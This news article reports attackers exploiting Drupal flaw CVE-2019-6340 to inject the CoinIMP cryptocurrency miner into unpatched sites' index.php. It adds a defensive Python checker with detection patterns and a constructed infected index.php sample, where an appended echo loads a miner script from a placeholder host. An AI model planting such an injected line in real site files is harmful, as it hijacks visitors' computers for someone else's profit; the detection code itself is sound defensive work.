Cybercriminals have begun exploiting an already patched security vulnerability in the wild to install cryptocurrency miners on Drupal websites that have not yet applied the fix.
Last week, developers of the popular open-source content management system Drupal patched a critical remote code execution (RCE) vulnerability (CVE-2019-6340) in Drupal Core that could allow attackers to hack affected websites.
Although Drupal released no technical details of the vulnerability, proof-of-concept (PoC) exploit code for it was made publicly available on the Internet just two days after the Drupal security team rolled out the patched version of its software.
Now, security researchers at data center security vendor Imperva discovered a series of attacks—that began just a day after the exploit code went public—against its customers’ websites using an exploit that leverages the CVE-2019-6340 security flaw.
The attacks originated from several attackers and countries and were found targeting vulnerable Drupal websites, including sites in government and the financial services industry, that had not yet applied the fix for the Drupal Core vulnerability.
According to the researchers, the attacks started on February 23, just three days after the Drupal developers patched the vulnerability, and attempted to inject a JavaScript cryptocurrency miner named CoinIMP on the vulnerable Drupal websites to mine Monero and Webchain cryptocurrencies for attackers.
Similar to the infamous CoinHive service, CoinIMP is a browser-based cryptocurrency mining script. The attackers injected it into the index.php file of vulnerable Drupal websites so that visitors run the mining script, and mine cryptocurrency for the attackers, whenever they browse the site's main page.
This is not the first time we have seen attackers target vulnerable Drupal websites by exploiting a recently patched vulnerability.
Last year, attackers targeted hundreds of thousands of Drupal websites in mass attacks using in-the-wild exploits for two separate critical remote code execution vulnerabilities, dubbed Drupalgeddon2 and Drupalgeddon3.
In that case as well, the attacks started after security researchers released PoC exploit code for the Drupalgeddon2 and Drupalgeddon3 vulnerabilities on the Internet, which was then followed by large-scale Internet scanning and exploitation attempts.
When notifying readers of the latest Drupal release last week, which addressed this critical remote code execution vulnerability, The Hacker News also warned how popular Drupal exploits are among hackers and that you need to update your CMS as soon as possible.
Since it's better late than never, site administrators still running vulnerable versions of Drupal are strongly advised to patch the vulnerability by updating their CMS to Drupal 8.6.10 or Drupal 8.5.11 as soon as possible.
However, if your website has already been compromised, merely updating Drupal will not remove the "backdoors or malware code." To fully resolve the issue, you are advised to follow Drupal's guide for recovering a compromised site.
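The two checks an administrator would want from the advice above, a version test against the fixed releases named in this article and a scan of index.php for the kind of injected browser-miner line described earlier, as an added example that is not part of the original article. The sample index.php is constructed (loosely modelled on the Drupal 8 bootstrap), the miner host is a placeholder, and treating "8.5.x"/"8.6.x" as the only tracked branches is an assumption.

```python
import re

# Fixed releases named in the article, keyed by minor branch (assumption:
# any other branch is reported as None, i.e. "not tracked here").
FIXED_RELEASES = {(8, 5): (8, 5, 11), (8, 6): (8, 6, 10)}

def parse_version(version):
    """Turn a Drupal version string such as '8.6.9' (or '7.64') into an int tuple."""
    parts = version.strip().split(".")
    if len(parts) not in (2, 3) or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Drupal version: {version!r}")
    return tuple(int(p) for p in parts)

def core_is_patched(version):
    """True if core is at or above the fixed release for its branch,
    False if it is older, None if the branch is not one we track."""
    v = parse_version(version)
    fixed = FIXED_RELEASES.get(v[:2])
    if fixed is None:
        return None
    return v >= fixed

# Drupal 8's index.php is a short pure-PHP bootstrap: it should contain no
# HTML <script> tag at all, let alone a reference to a browser miner.
SUSPECT_PATTERNS = [
    re.compile(r"<script\b", re.IGNORECASE),
    re.compile(r"coinimp", re.IGNORECASE),
]

def find_injected_miner(index_php_source):
    """Return 1-based line numbers that look like an injected mining payload."""
    hits = []
    for lineno, line in enumerate(index_php_source.splitlines(), start=1):
        if any(p.search(line) for p in SUSPECT_PATTERNS):
            hits.append(lineno)
    return hits

# Constructed sample: a clean bootstrap, then the same file with an appended
# echo of a miner <script> tag (placeholder host, not a real indicator).
CLEAN_INDEX = """<?php
use Drupal\\Core\\DrupalKernel;
$autoloader = require_once 'autoload.php';
$kernel = new DrupalKernel('prod', $autoloader);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
"""
INFECTED_INDEX = CLEAN_INDEX + "echo '<script src=\"https://miner.example/coinimp.js\"></script>';\n"
```

Run `find_injected_miner` over the real index.php on disk; any hit means the update alone is not enough and the recovery guide applies.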
Last week, Check Point also disclosed a 19-year-old RCE vulnerability in the popular WinRAR software, which has likewise been found being actively exploited in the wild to install malware on computers still running the vulnerable version of the software.